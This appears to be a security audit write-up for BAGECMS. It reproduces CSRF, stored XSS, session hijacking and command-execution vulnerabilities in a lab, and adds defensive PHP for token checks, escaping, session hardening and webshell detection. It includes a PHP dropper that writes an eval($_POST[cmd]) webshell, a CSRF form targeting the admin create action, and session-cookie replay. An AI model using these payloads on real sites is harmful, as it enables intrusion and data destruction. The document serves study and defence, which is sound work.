Preface

This content carries out a code audit and vulnerability reproduction for BAGECMS, a product listed in the CNVD general vulnerability database: several vulnerabilities from the CNVD entries are reproduced and mined further, and several new vulnerability points are found. The experiment runs in a target-machine (lab) environment. This content is only for study and research, not for illegal use.

1. Environment

Download the bagecms source code from http://61.155.169.167:81/uploads/userup/1870/bagecms.zip and place it under the phpstudy software to set up a web environment, then import the .sql database backup file into the local database manager. Alternatively, use the automatic installer: access http://xxx.com/bagecms3.1.0/upload//index.php?r=install and click Next.

After configuring the database information (server name, database name, database user and database password), the installation succeeds.



2. CMS framework audit

Below is the downloaded source tree; the code of interest lives under the upload folder, starting with index.php.

Look at index.php first, because the site's URL structure is /upload/index.php?r=xxx:

<?php
// Absolute paths of the framework bootstrap and the application config
$framework = dirname(__FILE__) . '/framework/yiilite.php';
$config = dirname(__FILE__) . '/protected/config/main.php';
// Web root with backslashes normalised to forward slashes
define('WWWPATH', str_replace(array('\\', '\\\\'), '/', dirname(__FILE__)));
define('DS', DIRECTORY_SEPARATOR);
require_once ($framework);
Yii::createWebApplication($config)->run();

1. $framework stores the absolute path of the current file's directory plus /framework/yiilite.php.
2. $config stores the absolute path of the current file's directory plus /protected/config/main.php.
3. define('WWWPATH', str_replace(array('\\', '\\\\'), '/', dirname(__FILE__))) obtains the root directory of the website, with backslashes replaced by forward slashes.
4. define('DS', DIRECTORY_SEPARATOR) defines the directory separator.
5. require_once($framework) includes and runs the specified file yiilite.php while the index.php script executes.
6. Yii::createWebApplication($config)->run() has the Yii framework start the web application object from the configuration.


Next look at yiilite.php, the file that index.php includes:

1. yiilite.php packs the commonly used framework classes into one file, reducing the number of include calls.
2. Trace() calls and comments have been removed from this code.
3. As a result yiilite.php reduces the number of files referenced and avoids trace statements.


Now analyze main.php, the configuration file the Yii application object loads at start-up. It defines a number of arrays holding settings: the gii module stores a password and the allowed host IP addresses, the db module stores the database connection information, and the urlManager module, the one of most interest here, defines the URL rules:

'urlManager'=>array(
 //'urlFormat'=>'path',
 'showScriptName'=>true,
 //'urlSuffix'=>'.html',
 'rules'=>array(
 'post/<id:\d+>/*'=>'post/show',
 'post/<id:\d+>_<title:\w+>/*'=>'post/show',
 'post/catalog/<catalog:[\w-_]+>/*'=>'post/index',
 'page/show/<name:\w+>/*'=>'page/show',
 'special/show/<name:[\w-_]+>/*'=>'special/show',
 '<controller:\w+>/<action:\w+>'=>'<controller>/<action>',
 ),
),


In the last rule, '<controller:\w+>/<action:\w+>'=>'<controller>/<action>':

<controller:\w+> refers to the matching controller, <action:\w+> refers to the matching method in that controller, and a named token such as <pid:\d+> obtains the corresponding request parameter by key (the rules above use <id:\d+> in the same way). This is how a request such as ?r=admini/admin/create is routed to the create action of the admin controller.


3. CSRF cross-site request forgery attack

CSRF attack mechanism: when you are logged on to a normal website, the browser holds your cookie; an attacker borrows your identity and sends a malicious request in your name, which is legitimate from the server's point of view, and so accomplishes what the attacker wants.

1. A normal user or administrator opens a browser, visits a trusted website and logs in with user name and password. The website returns cookie information to the browser, after which the user can send normal requests to the website.

2. The attacker constructs a web page containing the attacking code. The page is produced as follows: (1) In the website's add-user module, choose add user, fill in the add-user parameters and submit, capturing the request packet with burpsuite; the packet carries the POST data of the request. Right click --> Related Tools --> CSRF PoC generation produces a CSRF PoC.

(2) Copy the PoC (HTML code) into a newly created HTML file. In a real environment it could be delivered by QQ, e-mail, a personal VPS and so on; once the user opens the HTML file, the add-user operation is performed. (3) Structure of the PoC: <form action="http://IP/bagecms3.1.0/upload/index.php?r=admini/admin/create" method="POST"> targets the normal website and submits the hidden request data via submit. Here my value parameter is 1.

3. Before the user logs out, they open, in the same browser, the page built from the CSRF PoC (the page can be dressed up to tempt the user into clicking it). After the click, the website treats the request as the user's own and adds a user.

4. On receiving the attacking code, the browser follows the CSRF PoC page's request and sends it to the normal website carrying the user's cookie, without the user's knowledge. The normal website cannot tell that the request was initiated by the CSRF PoC page, so it processes the request with the user's permissions based on the cookie, and the malicious request from the CSRF PoC page takes effect.
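The server-side fix for the scenario above is a synchronizer token plus an origin check. The following PHP is an added example written for this page, not BAGECMS code; the function names and the field name csrf_token are hypothetical. The forged page in step 2 can make the browser send the cookie, but it cannot read the token embedded in the real form, so the request is refused before any write. (Yii 1.1, which BAGECMS is built on, ships the same idea as the enableCsrfValidation setting of its request component.)

```php
<?php
// Added example (not BAGECMS code): synchronizer-token CSRF protection for a
// state-changing admin action such as index.php?r=admini/admin/create.
// Function names and the 'csrf_token' field are hypothetical.

session_start();

// Issue one random token per session and embed it in every form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept the request only if the submitted token equals the session token.
// hash_equals() compares in constant time, so the check does not leak the
// token byte by byte through timing differences.
function csrf_validate(array $post): bool
{
    if (empty($_SESSION['csrf_token']) || !isset($post['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// Second layer: a page hosted elsewhere produces a foreign Origin/Referer,
// so require one whose host matches the site's own host.
function origin_matches(array $server, string $expectedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Rendering the "add user" form: the hidden field carries the token.
function render_create_user_form(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form action="index.php?r=admini/admin/create" method="POST">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="username"><input type="submit" value="Add user"></form>';
}

// Handling the POST: both checks run before the user record is created.
function handle_create_user(array $post, array $server, string $host): array
{
    if (!csrf_validate($post)) {
        return ['status' => 403, 'body' => 'missing or invalid CSRF token'];
    }
    if (!origin_matches($server, $host)) {
        return ['status' => 403, 'body' => 'cross-origin request refused'];
    }
    // Only now touch the database (omitted).
    return ['status' => 200, 'body' => 'user created'];
}

// Constructed demonstration: a legitimate submission versus a forged one
// that carries the cookie but neither the token nor a same-origin header.
$form = render_create_user_form();
$legit  = handle_create_user(['csrf_token' => csrf_token(), 'username' => 'alice'],
                             ['HTTP_ORIGIN' => 'http://xxx.com'], 'xxx.com');
$forged = handle_create_user(['username' => 'alice'],
                             ['HTTP_ORIGIN' => 'http://other.example'], 'xxx.com');
echo $legit['body'], PHP_EOL, $forged['body'], PHP_EOL;
```

The token must be tied to the session and regenerated when the session is, and the Origin check is a supplement rather than a replacement: some proxies strip Referer, which is why the code falls back to Origin first and treats a missing header as a refusal only for state-changing requests.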


4. XSS cross-site scripting attack

The vulnerability lives in the background (admin) site-settings module: constructing an XSS script there produces a pop-up window.

Because the content of the background site settings is displayed on the page, the pop-up window also appears when viewing the front page.

Code analysis: a global search leads to the footer.php file, where the contact-us module code is the following. The stored payload alert(111) is output by these echo statements when footer.php executes.

<p class="home"><?php echo $this->_conf['_address']?></p>
<p class="telephone"><?php echo $this->_conf['_telephone']?></p>
<p class="telephone"><?php echo $this->_conf['_fax']?></p>
<p class="mobile"><?php echo $this->_conf['_mobile']?></p>
<p class="email"><?php echo $this->_conf['admin_email']?></p>

The stored XSS executes successfully: because the site settings are POSTed into the database, a pop-up window appears every time the home page is visited.
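The root cause is that footer.php writes the stored settings straight into HTML. The following PHP is an added example for this page, not BAGECMS code: it shows the unescaped pattern beside an escaped version, using $conf as a stand-in for $this->_conf and a constructed settings array in place of database rows. The helper name e() is hypothetical; Yii 1.1 offers CHtml::encode() for the same purpose.

```php
<?php
// Added example (not BAGECMS code): output escaping for the footer.php
// pattern. $conf stands in for $this->_conf; the values are constructed.

$conf = [
    '_address'    => 'Example Street 1',
    '_telephone'  => '<script>alert(111)</script>',     // the page's payload
    '_fax'        => '',
    '_mobile'     => '123456',
    'admin_email' => 'admin@example.test" onmouseover="alert(1)',
];

// Vulnerable: the stored value becomes part of the document, so the
// <script> element is parsed and executed on every page view.
function footer_unescaped(array $conf): string
{
    return '<p class="telephone">' . $conf['_telephone'] . '</p>';
}

// Hardened: HTML-encode at the point of output. ENT_QUOTES also encodes
// quotes so a value cannot break out of an attribute; ENT_SUBSTITUTE keeps
// invalid byte sequences from silently emptying the output; the explicit
// charset avoids multibyte encoding tricks.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function footer_escaped(array $conf): string
{
    $html = '';
    $fields = ['home' => '_address', 'telephone' => '_telephone', 'fax' => '_fax',
               'mobile' => '_mobile', 'email' => 'admin_email'];
    foreach ($fields as $class => $key) {
        $html .= '<p class="' . $class . '">' . e($conf[$key] ?? '') . '</p>' . PHP_EOL;
    }
    return $html;
}

// Defence in depth on the way in: the settings form should only accept
// values that look like what the field is for. Output escaping is still
// required, because stored data can reach the page by other routes.
function telephone_is_valid(string $value): bool
{
    return $value === '' || preg_match('/^[0-9+\-\s()]{3,30}$/', $value) === 1;
}

echo footer_unescaped($conf), PHP_EOL;   // script tag reaches the browser intact
echo footer_escaped($conf);              // script tag arrives as &lt;script&gt;...
var_dump(telephone_is_valid($conf['_telephone']));
```

Escaping belongs at the output boundary, and the encoding must match the context: htmlspecialchars() is correct inside element content and quoted attributes, but a value placed inside a <script> block or a URL needs a different encoder.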


5. Session hijacking attack

Principle of session hijacking: a regular user is issued a session when visiting the site; the attacker obtains the user's session by some means and, by substituting it for their own session, accesses the normal user's data.

1. The target user logs in to the website. After the login succeeds, the user is issued a session to keep the conversation going.

2. The attacker obtains the session through some means (XSS, brute force, session enumeration, phishing, etc.) and then modifies the request packet to hijack the website session, e.g. Cookie: PHPSESSID=v7iomrvcfjq6uhnjduv8h6dit3

3. Once the attacker holds a session, they can operate the website background without logging in (the session stays unchanged). For the test, try deleting a file from a browser that is not logged in; the packet captured at this point carries the session value Cookie: PHPSESSID=qtc31bohagca38o88kuife81j6

Deleting files from the website without logging in shows the following information before the deletion:

Change the cookie value in the captured, unauthenticated packet to Cookie: PHPSESSID=v7iomrvcfjq6uhnjduv8h6dit3, then request the file-deletion packet and click Send.

The file is deleted successfully; the following output is displayed.
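The scenario above works because the session id alone is the credential and it never changes or expires. The following PHP is an added example for this page, not BAGECMS code, showing the standard mitigations: cookie attributes that keep PHPSESSID away from the stored XSS of section 4 and off plaintext HTTP, id rotation on login, a per-request validity check, and server-side destruction on logout. Function names are hypothetical; the array form of session_set_cookie_params() assumes PHP 7.3 or later.

```php
<?php
// Added example (not BAGECMS code): session hardening against hijacking.
// Function names are hypothetical; requires PHP >= 7.3 for the array form
// of session_set_cookie_params().

// 1. Cookie attributes. HttpOnly keeps PHPSESSID out of document.cookie
//    (so the stored XSS cannot read it), Secure keeps it off plain HTTP,
//    SameSite=Lax stops it riding along on cross-site POSTs.
function harden_session_cookie(bool $https): void
{
    session_set_cookie_params([
        'lifetime' => 0,          // session cookie, discarded when browser closes
        'path'     => '/',
        'secure'   => $https,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    // strict mode makes PHP refuse ids it did not generate itself, which
    // closes session fixation; cookies-only blocks ids passed in the URL.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');
}

// 2. On successful login, rotate the id so any id observed before
//    authentication is worthless, and record what the session belongs to.
function on_login_success(int $adminId, string $clientIp): void
{
    session_regenerate_id(true);     // true = discard the old id immediately
    $_SESSION['admin_id']  = $adminId;
    $_SESSION['bound_ip']  = $clientIp;
    $_SESSION['last_seen'] = time();
}

// 3. On every admin request, confirm the session is still the one issued
//    at login: authenticated, same client address, and not idle too long.
//    Pure function over the session array so it can be exercised directly.
function session_is_valid(array $session, string $clientIp, int $now, int $idleLimit = 900): bool
{
    if (empty($session['admin_id'])) {
        return false;                               // never logged in
    }
    if (($session['bound_ip'] ?? '') !== $clientIp) {
        return false;                               // replayed from elsewhere
    }
    if ($now - (int) ($session['last_seen'] ?? 0) > $idleLimit) {
        return false;                               // idle timeout
    }
    return true;
}

// 4. Logout destroys the server-side state, so a copied PHPSESSID can no
//    longer be replayed after the user leaves.
function on_logout(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000,
                  $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}

// Constructed check of the validity rules with a fake session array.
$sess = ['admin_id' => 1, 'bound_ip' => '10.0.0.5', 'last_seen' => 1000];
var_dump(session_is_valid($sess, '10.0.0.5', 1500));   // same client, fresh
var_dump(session_is_valid($sess, '10.0.0.9', 1500));   // copied id, other host
var_dump(session_is_valid($sess, '10.0.0.5', 5000));   // idle past the limit
```

Binding to the client address is a trade-off: users behind carrier-grade NAT or on mobile networks change address legitimately, so many deployments bind to a coarser key or rely on the idle timeout and rotation alone. Whichever key is used, the deletion in the test above should also have required a re-authentication step for destructive admin actions.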


6. Command execution vulnerability

The code-configuration edit function of the website module neither filters nor checks the file content, so malicious code added to the file is parsed and executed directly.

The background site module stores the site configuration files, among which question/index.php is the message-board configuration file. Appending the following code to the end of question/index.php writes a one-word Trojan to the file su.php (creating it if it does not exist):

<?php file_put_contents("su.php", "<?php @eval(\$_POST[cmd]); ?>"); ?>

Access http://xxx.com/bagecms3.1.0/upload/index.php?r=question/index to make the code execute; the Trojan file su.php is created.

Access the Trojan file su.php and submit the parameter cmd through a POST request to get data.

Access the Trojan webshell through the AntSword tool.
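Two defensive pieces follow for the vulnerability above, as an added PHP example for this page rather than BAGECMS code: a save handler for admin-editable template files that refuses anything the PHP engine would execute, and a sweep that flags PHP files under the web root containing the kind of construct the one-word Trojan uses or modified outside a deployment. Function names, the themes directory and the sample files are hypothetical.

```php
<?php
// Added example (not BAGECMS code): (a) refuse executable content in files
// edited through the admin UI, (b) sweep the web root for webshell-like
// PHP. Function names and paths are hypothetical.

// (a) A template or config file edited from the browser should only ever
//     be markup or data. Any PHP open tag turns it into code.
function template_content_is_safe(string $content): bool
{
    if (preg_match('/<\?(php\b|=)?/i', $content)) {
        return false;                    // <?php, <?= or short open tag
    }
    if (strpos($content, '?>') !== false) {
        return false;                    // stray close tag, reject for clarity
    }
    return true;
}

function save_template(string $themesDir, string $name, string $content): bool
{
    if (!template_content_is_safe($content)) {
        return false;                    // log the attempt with the admin account
    }
    $base = realpath($themesDir);
    if ($base === false) {
        return false;
    }
    // basename() discards any directory part, so "../../protected/x" cannot
    // escape the themes directory.
    $target = $base . DIRECTORY_SEPARATOR . basename($name);
    return file_put_contents($target, $content, LOCK_EX) !== false;
}

// (b) Detection sweep over the web root. Patterns cover the page's
//     eval($_POST[...]) Trojan, other request-driven execution sinks, and
//     code that writes a .php file (the dropper used in the scenario).
function find_suspicious_php(string $root, int $modifiedSince): array
{
    $patterns = [
        'eval on request input'   => '/\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b/i',
        'exec sink on request'    => '/\b(assert|system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b/i',
        'writes a .php file'      => '/\bfile_put_contents\s*\(\s*["\'][^"\']*\.php["\']/i',
    ];
    $hits = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $src = file_get_contents($file->getPathname());
        $reasons = [];
        foreach ($patterns as $label => $re) {
            if (preg_match($re, $src)) {
                $reasons[] = $label;
            }
        }
        if ($file->getMTime() >= $modifiedSince) {
            $reasons[] = 'modified after last deployment';
        }
        if ($reasons) {
            $hits[$file->getPathname()] = $reasons;
        }
    }
    return $hits;
}

// Constructed demonstration in a temporary directory.
$root = sys_get_temp_dir() . '/webroot_demo_' . getmypid();
mkdir($root . '/themes', 0700, true);
file_put_contents($root . '/ok.php', "<?php echo 'hello';");
file_put_contents($root . '/su.php', '<?php @eval($_POST[cmd]); ?>');
var_dump(save_template($root . '/themes', 'footer.tpl', '<p>contact us</p>'));      // accepted
var_dump(save_template($root . '/themes', 'footer.tpl', '<?php file_put_contents("su.php", "x"); ?>')); // refused
print_r(find_suspicious_php($root, time() + 3600));   // every file is "new" here; su.php also matches eval
```

The sweep is a detection aid, not a guarantee: obfuscated shells avoid these literal patterns, so pair it with a file-integrity baseline (hashes of the deployed tree) and with filesystem permissions that deny the web server user write access to any .php file. Removing write access alone would have stopped the dropper in this section.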

To sum up, in the process of code audit and reproduction, the first step is to consult the CNVD vulnerability database to see which vulnerabilities exist, then visit the likely vulnerable points and try to mine them. The vulnerability points above were found this way, and the mining thought process is attached. This article is only for study and research, not illegal operation.